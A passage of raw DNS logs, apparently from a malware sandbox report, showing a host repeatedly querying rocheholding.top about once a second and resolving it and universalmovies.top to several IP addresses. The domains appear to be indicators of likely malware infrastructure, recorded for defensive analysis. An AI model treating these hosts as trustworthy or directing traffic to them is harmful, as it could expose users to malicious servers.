                      May 23, 2024 20:17:57.904227018 CEST192.168.2.228.8.8.80xf66bStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:58.806338072 CEST192.168.2.228.8.8.80x45d7Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:17:59.746988058 CEST192.168.2.228.8.8.80xf400Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:00.717585087 CEST192.168.2.228.8.8.80x9109Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:01.529481888 CEST192.168.2.228.8.8.80x99a5Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:02.352221966 CEST192.168.2.228.8.8.80xc624Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:03.263438940 CEST192.168.2.228.8.8.80xc016Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:04.145406961 CEST192.168.2.228.8.8.80x8c4dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:06.025861979 CEST192.168.2.228.8.8.80xc569Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.059591055 CEST192.168.2.228.8.8.80xf630Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.975244045 CEST192.168.2.228.8.8.80xf4b1Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:08.933924913 CEST192.168.2.228.8.8.80x3521Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:09.836658001 CEST192.168.2.228.8.8.80xc56aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:10.664048910 CEST192.168.2.228.8.8.80x4e05Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:11.700437069 CEST192.168.2.228.8.8.80x2b72Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:16.256679058 CEST192.168.2.228.8.8.80xf18cStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:17.142232895 CEST192.168.2.228.8.8.80xfa0aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.062695980 CEST192.168.2.228.8.8.80xaa95Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.956516027 CEST192.168.2.228.8.8.80xa1ccStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:19.968893051 CEST192.168.2.228.8.8.80xf561Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:20.867146969 CEST192.168.2.228.8.8.80x8de3Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:21.821590900 CEST192.168.2.228.8.8.80xdf91Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:22.757569075 CEST192.168.2.228.8.8.80x2be1Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:23.657824039 CEST192.168.2.228.8.8.80x47e6Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:24.550265074 CEST192.168.2.228.8.8.80x82dbStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:25.467520952 CEST192.168.2.228.8.8.80x704aStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:26.579898119 CEST192.168.2.228.8.8.80x98d5Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:27.495337009 CEST192.168.2.228.8.8.80xcd9fStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:28.359879017 CEST192.168.2.228.8.8.80xfb0fStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:29.273845911 CEST192.168.2.228.8.8.80xa5a1Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.078829050 CEST192.168.2.228.8.8.80xc549Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.942620993 CEST192.168.2.228.8.8.80x3f3dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:31.696842909 CEST192.168.2.228.8.8.80xbac9Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:37.662822962 CEST192.168.2.228.8.8.80x82cfStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:38.545434952 CEST192.168.2.228.8.8.80x9000Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:39.366585016 CEST192.168.2.228.8.8.80xeeb3Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:40.258249998 CEST192.168.2.228.8.8.80x9716Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.194926023 CEST192.168.2.228.8.8.80x683cStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.964387894 CEST192.168.2.228.8.8.80x4f9cStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:42.894562006 CEST192.168.2.228.8.8.80x763fStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:43.769901991 CEST192.168.2.228.8.8.80xcbb6Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:44.703257084 CEST192.168.2.228.8.8.80x25c0Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:45.610503912 CEST192.168.2.228.8.8.80x6ef8Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:46.503257036 CEST192.168.2.228.8.8.80xbb0Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:47.426409006 CEST192.168.2.228.8.8.80xbfd4Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:48.336954117 CEST192.168.2.228.8.8.80x66eStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:49.150943041 CEST192.168.2.228.8.8.80x9279Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:50.047169924 CEST192.168.2.228.8.8.80xaf87Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:51.063582897 CEST192.168.2.228.8.8.80x1204Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:52.355403900 CEST192.168.2.228.8.8.80x3a9dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:53.327960014 CEST192.168.2.228.8.8.80xcdeStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:54.296926975 CEST192.168.2.228.8.8.80x96c9Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:55.205929995 CEST192.168.2.228.8.8.80x1dcbStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.074978113 CEST192.168.2.228.8.8.80x3b1cStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:56.889071941 CEST192.168.2.228.8.8.80x1323Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:57.777982950 CEST192.168.2.228.8.8.80xd83dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:58.578927994 CEST192.168.2.228.8.8.80x741dStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:18:59.505765915 CEST192.168.2.228.8.8.80x96d3Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:00.410475969 CEST192.168.2.228.8.8.80x5508Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:01.344558954 CEST192.168.2.228.8.8.80x8bb0Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:02.166636944 CEST192.168.2.228.8.8.80x857fStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:03.302340031 CEST192.168.2.228.8.8.80xee35Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:04.210112095 CEST192.168.2.228.8.8.80xde3Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:05.117906094 CEST192.168.2.228.8.8.80xc242Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:06.049398899 CEST192.168.2.228.8.8.80xa5d5Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.004072905 CEST192.168.2.228.8.8.80x955eStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:07.874579906 CEST192.168.2.228.8.8.80x3bdcStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:08.815145016 CEST192.168.2.228.8.8.80x5fdeStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:09.904633999 CEST192.168.2.228.8.8.80xa027Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:10.723278046 CEST192.168.2.228.8.8.80x6945Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:11.660978079 CEST192.168.2.228.8.8.80x1ac5Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:12.582365990 CEST192.168.2.228.8.8.80x9200Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:13.381937981 CEST192.168.2.228.8.8.80xe002Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:14.262255907 CEST192.168.2.228.8.8.80xdc3bStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.169820070 CEST192.168.2.228.8.8.80xc8bfStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:15.991466999 CEST192.168.2.228.8.8.80x1f8eStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:16.866609097 CEST192.168.2.228.8.8.80x3173Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:17.638184071 CEST192.168.2.228.8.8.80x9b3bStandard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      May 23, 2024 20:19:18.425237894 CEST192.168.2.228.8.8.80xaa28Standard query (0)rocheholding.topA (IP address)IN (0x0001)false
                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                      May 23, 2024 20:17:25.261668921 CEST8.8.8.8192.168.2.220x3c0cNo error (0)universalmovies.top104.21.74.191A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:25.261668921 CEST8.8.8.8192.168.2.220x3c0cNo error (0)universalmovies.top172.67.162.95A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:35.106868029 CEST8.8.8.8192.168.2.220xce84No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:35.106868029 CEST8.8.8.8192.168.2.220xce84No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:36.575613022 CEST8.8.8.8192.168.2.220x77b7No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:36.575613022 CEST8.8.8.8192.168.2.220x77b7No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:38.070122957 CEST8.8.8.8192.168.2.220x1d8aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:38.070122957 CEST8.8.8.8192.168.2.220x1d8aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:39.396862984 CEST8.8.8.8192.168.2.220xbc91No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:39.396862984 CEST8.8.8.8192.168.2.220xbc91No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:40.795311928 CEST8.8.8.8192.168.2.220xeb3dNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:40.795311928 CEST8.8.8.8192.168.2.220xeb3dNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:42.108488083 CEST8.8.8.8192.168.2.220x8573No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:42.108488083 CEST8.8.8.8192.168.2.220x8573No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:43.175477982 CEST8.8.8.8192.168.2.220x7dc0No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:43.175477982 CEST8.8.8.8192.168.2.220x7dc0No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:44.099220991 CEST8.8.8.8192.168.2.220x61ecNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:44.099220991 CEST8.8.8.8192.168.2.220x61ecNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:45.147840023 CEST8.8.8.8192.168.2.220xa76No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:45.147840023 CEST8.8.8.8192.168.2.220xa76No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:46.325120926 CEST8.8.8.8192.168.2.220x59e8No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:46.325120926 CEST8.8.8.8192.168.2.220x59e8No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:47.201168060 CEST8.8.8.8192.168.2.220xef97No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:47.201168060 CEST8.8.8.8192.168.2.220xef97No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:48.080511093 CEST8.8.8.8192.168.2.220xa16aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:48.080511093 CEST8.8.8.8192.168.2.220xa16aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:49.140233040 CEST8.8.8.8192.168.2.220xfa26No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:49.140233040 CEST8.8.8.8192.168.2.220xfa26No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.051635981 CEST8.8.8.8192.168.2.220x9e5bNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.051635981 CEST8.8.8.8192.168.2.220x9e5bNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.937587023 CEST8.8.8.8192.168.2.220x7e82No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:50.937587023 CEST8.8.8.8192.168.2.220x7e82No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:51.796273947 CEST8.8.8.8192.168.2.220x55d9No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:51.796273947 CEST8.8.8.8192.168.2.220x55d9No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:52.687720060 CEST8.8.8.8192.168.2.220x462bNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:52.687720060 CEST8.8.8.8192.168.2.220x462bNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:53.967643023 CEST8.8.8.8192.168.2.220xde7cNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:53.967643023 CEST8.8.8.8192.168.2.220xde7cNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.039443970 CEST8.8.8.8192.168.2.220xd483No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.039443970 CEST8.8.8.8192.168.2.220xd483No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.970849037 CEST8.8.8.8192.168.2.220x6a2aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:56.970849037 CEST8.8.8.8192.168.2.220x6a2aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:57.912106991 CEST8.8.8.8192.168.2.220xf66bNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:57.912106991 CEST8.8.8.8192.168.2.220xf66bNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:58.813364029 CEST8.8.8.8192.168.2.220x45d7No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:58.813364029 CEST8.8.8.8192.168.2.220x45d7No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:59.754622936 CEST8.8.8.8192.168.2.220xf400No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:17:59.754622936 CEST8.8.8.8192.168.2.220xf400No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:00.729857922 CEST8.8.8.8192.168.2.220x9109No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:00.729857922 CEST8.8.8.8192.168.2.220x9109No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:01.547060966 CEST8.8.8.8192.168.2.220x99a5No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:01.547060966 CEST8.8.8.8192.168.2.220x99a5No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:02.361994028 CEST8.8.8.8192.168.2.220xc624No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:02.361994028 CEST8.8.8.8192.168.2.220xc624No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:03.271300077 CEST8.8.8.8192.168.2.220xc016No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:03.271300077 CEST8.8.8.8192.168.2.220xc016No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:04.162955999 CEST8.8.8.8192.168.2.220x8c4dNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:04.162955999 CEST8.8.8.8192.168.2.220x8c4dNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:06.036633968 CEST8.8.8.8192.168.2.220xc569No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:06.036633968 CEST8.8.8.8192.168.2.220xc569No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.067257881 CEST8.8.8.8192.168.2.220xf630No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.067257881 CEST8.8.8.8192.168.2.220xf630No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.982644081 CEST8.8.8.8192.168.2.220xf4b1No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:07.982644081 CEST8.8.8.8192.168.2.220xf4b1No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:08.941198111 CEST8.8.8.8192.168.2.220x3521No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:08.941198111 CEST8.8.8.8192.168.2.220x3521No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:09.852065086 CEST8.8.8.8192.168.2.220xc56aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:09.852065086 CEST8.8.8.8192.168.2.220xc56aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:10.671595097 CEST8.8.8.8192.168.2.220x4e05No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:10.671595097 CEST8.8.8.8192.168.2.220x4e05No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:11.707437992 CEST8.8.8.8192.168.2.220x2b72No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:11.707437992 CEST8.8.8.8192.168.2.220x2b72No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:16.263711929 CEST8.8.8.8192.168.2.220xf18cNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:16.263711929 CEST8.8.8.8192.168.2.220xf18cNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:17.149425030 CEST8.8.8.8192.168.2.220xfa0aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:17.149425030 CEST8.8.8.8192.168.2.220xfa0aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.070195913 CEST8.8.8.8192.168.2.220xaa95No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.070195913 CEST8.8.8.8192.168.2.220xaa95No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.964488983 CEST8.8.8.8192.168.2.220xa1ccNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:18.964488983 CEST8.8.8.8192.168.2.220xa1ccNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:19.979517937 CEST8.8.8.8192.168.2.220xf561No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:19.979517937 CEST8.8.8.8192.168.2.220xf561No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:20.875355959 CEST8.8.8.8192.168.2.220x8de3No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:20.875355959 CEST8.8.8.8192.168.2.220x8de3No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:21.829258919 CEST8.8.8.8192.168.2.220xdf91No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:21.829258919 CEST8.8.8.8192.168.2.220xdf91No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:22.764985085 CEST8.8.8.8192.168.2.220x2be1No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:22.764985085 CEST8.8.8.8192.168.2.220x2be1No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:23.666145086 CEST8.8.8.8192.168.2.220x47e6No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:23.666145086 CEST8.8.8.8192.168.2.220x47e6No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:24.557745934 CEST8.8.8.8192.168.2.220x82dbNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:24.557745934 CEST8.8.8.8192.168.2.220x82dbNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:25.476716042 CEST8.8.8.8192.168.2.220x704aNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:25.476716042 CEST8.8.8.8192.168.2.220x704aNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:26.587213039 CEST8.8.8.8192.168.2.220x98d5No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:26.587213039 CEST8.8.8.8192.168.2.220x98d5No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:27.505067110 CEST8.8.8.8192.168.2.220xcd9fNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:27.505067110 CEST8.8.8.8192.168.2.220xcd9fNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:28.368410110 CEST8.8.8.8192.168.2.220xfb0fNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:28.368410110 CEST8.8.8.8192.168.2.220xfb0fNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:29.286659002 CEST8.8.8.8192.168.2.220xa5a1No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:29.286659002 CEST8.8.8.8192.168.2.220xa5a1No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.091368914 CEST8.8.8.8192.168.2.220xc549No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.091368914 CEST8.8.8.8192.168.2.220xc549No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.949893951 CEST8.8.8.8192.168.2.220x3f3dNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:30.949893951 CEST8.8.8.8192.168.2.220x3f3dNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:31.704309940 CEST8.8.8.8192.168.2.220xbac9No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:31.704309940 CEST8.8.8.8192.168.2.220xbac9No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:37.670048952 CEST8.8.8.8192.168.2.220x82cfNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:37.670048952 CEST8.8.8.8192.168.2.220x82cfNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:38.552854061 CEST8.8.8.8192.168.2.220x9000No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:38.552854061 CEST8.8.8.8192.168.2.220x9000No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:39.374072075 CEST8.8.8.8192.168.2.220xeeb3No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:39.374072075 CEST8.8.8.8192.168.2.220xeeb3No error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:40.266540051 CEST8.8.8.8192.168.2.220x9716No error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:40.266540051 CEST8.8.8.8192.168.2.220x9716No error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.202218056 CEST8.8.8.8192.168.2.220x683cNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.202218056 CEST8.8.8.8192.168.2.220x683cNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.971498966 CEST8.8.8.8192.168.2.220x4f9cNo error (0)rocheholding.top188.114.96.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:41.971498966 CEST8.8.8.8192.168.2.220x4f9cNo error (0)rocheholding.top188.114.97.9A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:42.906310081 CEST8.8.8.8192.168.2.220x763fNo error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:42.906310081 CEST8.8.8.8192.168.2.220x763fNo error (0)rocheholding.top188.114.96.3A (IP address)IN (0x0001)false
                      May 23, 2024 20:18:43.776977062 CEST8.8.8.8192.168.2.220xcbb6No error (0)rocheholding.top188.114.97.3A (IP address)IN (0x0001)false
